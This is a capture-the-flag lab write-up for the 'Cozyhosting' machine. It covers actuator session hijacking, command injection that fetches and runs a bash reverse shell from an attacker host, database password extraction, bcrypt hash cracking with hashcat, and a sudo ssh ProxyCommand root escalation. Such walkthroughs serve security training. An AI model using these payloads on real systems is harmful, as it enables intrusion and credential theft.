Cozyhosting

Information Gathering

Port and Services

# Nmap 7.95 scan initiated Tue May 13 18:39:53 2025 as: /usr/lib/nmap/nmap --privileged -p- -oN nmap_result -sVC --min-rate 1000 10.10.11.230
Nmap scan report for 10.10.11.230
Host is up (0.063s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_  256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 13 18:40:19 2025 -- 1 IP address (1 host up) scanned in 26.05 seconds

Initial Access

Spring Boot Actuator

https://github.com/WuliRuler/SBSCAN

┌──(kali㉿kali)-[~/ctf/cozyhosting/SBSCAN]
└─$ python3 sbscan.py -u http://cozyhosting.htb -t 200
[-- SNIP --]
╭─────────────────────────┬───────────┬──────────────────────────────────────────┬───────────────╮  
│ URL                     │ IS_SPRING │ Detected Paths                           │ Detected CVEs │
├─────────────────────────┼───────────┼──────────────────────────────────────────┼───────────────┤
│ http://cozyhosting.htb/ │ None      │ http://cozyhosting.htb/actuator          │ None          │
│                         │           │ http://cozyhosting.htb/actuator/beans    │               │
│                         │           │ http://cozyhosting.htb/actuator/env      │               │
│                         │           │ http://cozyhosting.htb/actuator/health   │               │
│                         │           │ http://cozyhosting.htb/actuator/mappings │               │
│                         │           │ http://cozyhosting.htb/actuator/sessions │               │
╰─────────────────────────┴───────────┴──────────────────────────────────────────┴───────────────╯

http://cozyhosting.htb/actuator/sessions

{
  "D1B6BA5C43338ECD04AC728C22214D77": "UNAUTHORIZED",
  "ED31AC8A440FFB9B2CE6E72972C998D0": "UNAUTHORIZED",
  "3F524B3454562810D7FBC556B57B1D85": "kanderson"
}

change JSESSIONID Cookie value using kanderson cookie

http://cozyhosting.htb/admin

Command Injection

asd|$(cat /etc/passwd)

┌──(kali㉿kali)-[~/ctf/cozyhosting]
└─$ cat rev.sh  
bash -i >& /dev/tcp/10.10.16.20/443 0>&1
                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/ctf/cozyhosting]
└─$ python3 -m http.server -b 10.10.16.20 80 
Serving HTTP on 10.10.16.20 port 80 (http://10.10.16.20:80/) ...

asd|$(wget${IFS}http://10.10.16.20:80/rev.sh${IFS}-O${IFS}/tmp/reverse.sh${IFS}&&${IFS}bash${IFS}/tmp/reverse.sh)

app@cozyhosting:/app$ ls -la
ls -la
total 58856
drwxr-xr-x  2 root root     4096 Aug 14  2023 .
drwxr-xr-x 19 root root     4096 Aug 14  2023 ..
-rw-r--r--  1 root root 60259688 Aug 11  2023 cloudhosting-0.0.1.jar

app@cozyhosting:/app$ mkdir /tmp/xxx
mkdir /tmp/xxx
app@cozyhosting:/app$ cp cloudhosting-0.0.1.jar /tmp/xxx
cp cloudhosting-0.0.1.jar /tmp/xxx
app@cozyhosting:/app$ cd /tmp/xxx
cd /tmp/xxx
app@cozyhosting:/tmp/xxx$ ls
ls
cloudhosting-0.0.1.jar
app@cozyhosting:/tmp/xxx$ unzip cloudhosting-0.0.1.jar
unzip cloudhosting-0.0.1.jar
Archive:  cloudhosting-0.0.1.jar
   creating: META-INF/
  inflating: META-INF/MANIFEST.MF    
   creating: org/
[-- SNIP --]
app@cozyhosting:/tmp/xxx$ ls -la
ls -la
total 58872
drwxr-xr-x  5 app  app      4096 May 13 06:30 .
drwxrwxrwt 17 root root     4096 May 13 07:45 ..
drwxr-xr-x  4 app  app      4096 Aug 10  2023 BOOT-INF
-rw-r--r--  1 app  app  60259688 May 13 06:29 cloudhosting-0.0.1.jar
drwxr-xr-x  3 app  app      4096 Aug 10  2023 META-INF
drwxr-xr-x  3 app  app      4096 Feb  1  1980 org
app@cozyhosting:/tmp/xxx$ rm cloudhosting-0.0.1.jar

password search

pp@cozyhosting:/tmp/xxx$ grep -Rina password
[--SNIP--]
BOOT-INF/classes/application.properties:12:spring.datasource.password=Vg&nvzAQ7XxR
BOOT-INF/classes/htb/cloudhosting/scheduled/FakeUser.class:7:--data-ra,(username=kanderson&password=MRdEQuv6~6P.-v

disini mendapatkan password

app@cozyhosting:/tmp/xxx$ cat BOOT-INF/classes/application.properties
cat BOOT-INF/classes/application.properties
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR
app@cozyhosting:/tmp/xxx$

app@cozyhosting:/app$ ss -tupln
ss -tupln
Netid State  Recv-Q Send-Q      Local Address:Port Peer Address:PortProcess                           
udp   UNCONN 0      0           127.0.0.53%lo:53        0.0.0.0:*                                     
udp   UNCONN 0      0                 0.0.0.0:68        0.0.0.0:*                                     
tcp   LISTEN 0      5                 0.0.0.0:4444      0.0.0.0:*    users:(("python3",pid=4501,fd=3))
tcp   LISTEN 0      5                 0.0.0.0:8000      0.0.0.0:*    users:(("python3",pid=4442,fd=3))
tcp   LISTEN 0      511               0.0.0.0:80        0.0.0.0:*                                     
tcp   LISTEN 0      4096        127.0.0.53%lo:53        0.0.0.0:*                                     
tcp   LISTEN 0      128               0.0.0.0:22        0.0.0.0:*                                     
tcp   LISTEN 0      244             127.0.0.1:5432      0.0.0.0:*                                     
tcp   LISTEN 0      100    [::ffff:127.0.0.1]:8080            *:*    users:(("java",pid=1062,fd=19))  
tcp   LISTEN 0      128                  [::]:22           [::]:*                                     
app@cozyhosting:/app$ psql

app@cozyhosting:/app$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
app@cozyhosting:/app$ ls -la
ls -la
total 58856
drwxr-xr-x  2 root root     4096 Aug 14  2023 .
drwxr-xr-x 19 root root     4096 Aug 14  2023 ..
-rw-r--r--  1 root root 60259688 Aug 11  2023 cloudhosting-0.0.1.jar
app@cozyhosting:/app$  psql -h 127.0.0.1 -p 5432 -U postgres --password
 psql -h 127.0.0.1 -p 5432 -U postgres --password
Password: Vg&nvzAQ7XxR

psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.

postgres=#

list database

postgres-# \l
\l
WARNING: terminal is not fully functional
Press RETURN to continue 

                                   List of databases
    Name     |  Owner   | Encoding |   Collate   |    Ctype    |   Access privil
eges   
-------------+----------+----------+-------------+-------------+----------------
-------
 cozyhosting | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | 
 postgres    | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | 
 template0   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres    
      +
             |          |          |             |             | postgres=CTc/po
stgres
 template1   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres    
      +
             |          |          |             |             | postgres=CTc/po
stgres
(4 rows)

switch database and list tables

postgres-# \c cozyhosting
\c cozyhosting
Password: Vg&nvzAQ7XxR

SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
You are now connected to database "cozyhosting" as user "postgres".
cozyhosting-# 

cozyhosting-# \dt
\dt
WARNING: terminal is not fully functional
Press RETURN to continue 

         List of relations
 Schema | Name  | Type  |  Owner   
--------+-------+-------+----------
 public | hosts | table | postgres
 public | users | table | postgres
(2 rows)

dump table user

cozyhosting=# select * from users;
select * from users;
WARNING: terminal is not fully functional
Press RETURN to continue 

   name    |                           password                           | role
  
-----------+--------------------------------------------------------------+-----
--
 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admi
n
(2 rows)

kanderson creds was found in prev enum, i will crack the admin hash

┌──(kali㉿kali)-[~/ctf/cozyhosting]
└─$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt
[SNIP]
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited

try login to josh user with manchesterunited password

┌──(kali㉿kali)-[~/ctf/cozyhosting]
└─$ ssh [email protected]      
[email protected]'s password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed May 14 03:13:32 AM UTC 2025

  System load:           0.0
  Usage of /:            59.3% of 5.42GB
  Memory usage:          28%
  Swap usage:            0%
  Processes:             262
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.230
  IPv6 address for eth0: dead:beef::250:56ff:feb9:5f53


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue May 13 13:06:07 2025 from 10.10.14.7
josh@cozyhosting:~$

Priv Escalation

https://gtfobins.github.io/gtfobins/ssh/

josh@cozyhosting:~$ sudo -l
[sudo] password for josh: 
Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# id
uid=0(root) gid=0(root) groups=0(root)
#

PreviousNibbles NextKeeper

Last updated 7 months ago